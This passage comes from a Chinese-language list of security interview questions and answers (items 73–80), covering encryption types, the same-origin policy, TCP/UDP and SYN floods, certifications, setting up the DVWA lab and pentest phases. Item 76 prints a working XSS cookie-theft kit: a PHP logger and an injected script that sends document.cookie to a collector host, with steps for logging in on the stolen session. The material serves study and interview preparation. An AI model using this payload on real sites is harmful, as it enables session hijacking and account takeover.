问其他计算机的话首先也要找到这个组中的一台类似组控服务器,组控服务器不
是固定的,以选举的方式实现,它存储着这个组的相关信息,找到这台计算机后
得到组的信息然后访问。
73.对称加密非对称加密?
对称加密:加解密用同一密钥,密钥维护复杂 n(n-1)/2,不适合互联网传输
密钥,加解密效率高。应用于加密数据。
非对称加密:公钥推不出私钥,每个用户一个非对称密钥对就可以,适合于互联
网传输公钥,但是加密效率低,应用于数字签名及加密。
74.什么是同源策略?
1. 为了防止不同域在用户浏览器中彼此干扰,浏览器对从不同来源(域)收
到的内容进行隔离。
浏览器不允许任何旧有脚本访问一个站点的 cookie,否则 ,会话容易被劫持。只有发布 cookie 的站点能够访问这些 cookie,只有通过该站点返回的页面所包含或加载的 JavaScript 才能访问 cookie。协议相同,域名相同,端口相同
75.cookie 存在哪里?可以打开吗?
C:\Users\用户名\AppData\Roaming\Microsoft\Windows\Cookies 工具--文件夹选项--查看--将隐藏被保护的文件的对勾去掉就会看到 cookies 文件夹。
76.xss 如何盗取 cookie?
攻击者代码:
<?php
$cookie=$_GET['cookie'];
$time=date('Y-m-d g:i:s');
$referer=getenv('HTTP_REFERER');
$cookietxt=fopen('cookie.txt','a');
fwrite($cookietxt,"time:".$time." cookie:".$cookie." referer:".$referer."");
注意双引号,容易出错
fclose($cookietxt);
?>
脚本端:
<script>
document.write('<img
src="http://ip/cookie.php?cookie='+document.cookie+'" width=0
height=0 border=0 />');
</script>
获取到 cookie 后,用 firebug 找到 cookie,新建 cookie
加入 cookie,用 referer 来提交,无需输入帐号密码直接登录进去!
77.tcp、udp 的区别及 tcp 三次握手,syn 攻击?
也可参考
http://www.cnblogs.com/bizhu/archive/2012/05/12/2497493.html
(1)tcp、udp 区别
TCP 的优点:
可靠,稳定
TCP 的可靠体现在 TCP 在传递数据之前,会有三次握手来建立连接,而且在数
据传递时,有确认、窗口、重传、拥塞控制机制,在数据传完后,还会断开连接
用来节约系统资源。
TCP 的缺点:
慢,效率低,占用系统资源高,易被攻击
TCP 在传递数据之前,要先建连接,这会消耗时间,而且在数据传递时,确认机制、重传机制、拥塞控制机制等都会消耗大量的时间,而且要在每台设备上维护 所有的传输连接,事实上,每个连接都会占用系统的 CPU、内存等硬件资源。 而且,因为 TCP 有确认机制、三次握手机制,这些也导致 TCP 容易被人利用, 实现 DOS、DDOS、CC 等攻击。
UDP 的优点:
快,比 TCP 稍安全
UDP 没有 TCP 的握手、确认、窗口、重传、拥塞控制等机制,UDP 是一个无状
态的传输协议,所以它在传递数据时非常快。没有 TCP 的这些机制,UDP 较 TCP
被攻击者利用的漏洞就要少一些。但 UDP 也是无法避免攻击的,比如:UDP
Flood 攻击……
UDP 的缺点:
不可靠,不稳定
因为 UDP 没有 TCP 那些可靠的机制,在数据传递时,如果网络质量不好,就会
很容易丢包。
基于上面的优缺点,那么:
什么时候应该使用 TCP:
当对网络通讯质量有要求的时候,比如:整个数据要准确无误的传递给对方,这往往用于一些要求可靠的应用,比如 HTTP、HTTPS、FTP 等传输文件的协议, POP、SMTP 等邮件传输的协议。 在日常生活中,常见使用 TCP 协议的应用如下:
浏览器,用的 HTTPFlashFXP,用的 FTP
Outlook,用的 POP、SMTP
Putty,用的 Telnet、SSH
QQ 文件传输
什么时候应该使用 UDP: 当对网络通讯质量要求不高的时候,要求网络通讯速度能尽量的快,这时就可以使用 UDP。 比如,日常生活中,常见使用 UDP 协议的应用如下:
QQ 语音
QQ 视频
TFTP
(2)TCP 握手协议
在 TCP/IP 协议中,TCP 协议提供可靠的连接服务,采用三次握手建立一个连接。 第一次握手:建立连接时,客户端发送 syn 包(syn=j)到服务器,并进入 SYN_SEND 状态,等待服务器确认;
第二次握手:服务器收到 syn 包,必须确认客户的 SYN(ack=j+1),同时自己也发送一个 SYN 包(syn=k),
即 SYN+ACK 包,此时服务器进入 SYN_RECV 状态; 第三次握手:客户端收到服务器的 SYN+ACK 包,向服务器发送确认包 ACK(ack=k+1),此包发送完毕,
客户端和服务器进入 ESTABLISHED 状态,完成三次握手。 完成三次握手,客户端与服务器开始传送数据,在上述过程中,还有一些重要的概念:
未连接队列:在三次握手协议中,服务器维护一个未连接队列,该队列为每个客
户端的 SYN 包(syn=j)开设一个条目, 该条目表明服务器已收到 SYN 包,并向客户发出确认,正在等待客户的确认包。 这些条目所标识的连接在服务器处于 Syn_RECV 状态, 当服务器收到客户的确认包时,删除该条目,服务器进入 ESTABLISHED 状态。 backlog 参数:表示未连接队列的最大容纳数目。 SYN-ACK 重传次数 服务器发送完 SYN-ACK 包,如果未收到客户确认包, 服务器进行首次重传,等待一段时间仍未收到客户确认包, 进行第二次重传,如果重传次数超过系统规定的最大重传次数,系统将该连接信息从半连接队列中删除。注意,每次重传等待的时间不一定相同。 半连接存活时间:是指半连接队列的条目存活的最长时间,也即服务从收到 SYN 包到确认这个报文无效的最长时间, 该时间值是所有重传请求包的最长等待时间总和。有时我们也称半连接存活时间 为 Timeout 时间、SYN_RECV 存活时间。
(3)SYN 攻击原理
SYN 攻击属于 DOS 攻击的一种,它利用 TCP 协议缺陷,通过发送大量的半连接请求,耗费 CPU 和内存资源。
SYN 攻击除了能影响主机外,还可以危害路由器、防火墙等网络系统,事实上SYN 攻击并不管目标是什么系统,只要这些系统打开 TCP 服务就可以实施。从上图可看到,服务器接收到连接请 求(syn=j), 将此信息加入未连接队列,并发送请求包给客户(syn=k,ack=j+1),此时进入SYN_RECV 状态。 当服务器未收到客户端的确认包时,重发请求包,一直到超时,才将此条目从未连接队列删除。 配合 IP 欺骗,SYN 攻击能达到很好的效果,通常,客户端在短时间内伪造大量不存在的 IP 地址,向服务器不断地发送 syn 包,服务器回复确认包,并等待客户的确认,由于源
地址是不存在的, 服务器需要不断的重发直至超时,这些伪造的 SYN 包将长时间占用未连接队列, 正常的 SYN 请求被丢弃,目标系统运行缓慢,严重者引起网络堵塞甚至系统瘫痪。
78.证书要考哪些?
信息安全国际第一认证——CISSP
信息安全国内认证——CISAW
信息安全国内认证——CISP
信息安全技术实操认证新贵——Security+
IT 审计人员的必备之证——CISA=
79.DVWA 是如何搭建的?
启动 xampp(XAMPP(Apache+MySQL+PHP+PERL)是一个功能强大的建
站集成软件包。)下的 apache 中间件和 mysql 将 dvwa 放到 xampp 下的 htdocs 目录下
在浏览器输入 http://127.0.0.1/dvwa 即可使用啦! 还有 owasp 的漏洞练习平台:
https://sourceforge.net/projects/owaspbwa/files/
80.渗透测试的流程是什么?
渗透测试流程概述
前期交互阶段、情报搜集阶段、威胁建模阶段、漏洞分析阶段、
渗透攻击阶段(Exploitation)、后渗透攻击阶段(怎么一直控制,维持访问)、
报告阶段。
攻击前:网络踩点、网络扫描、网络查点
攻击中:利用漏洞信息进行渗透攻击、获取权限
攻击后:后渗透维持攻击、文件拷贝、木马植入、痕迹擦除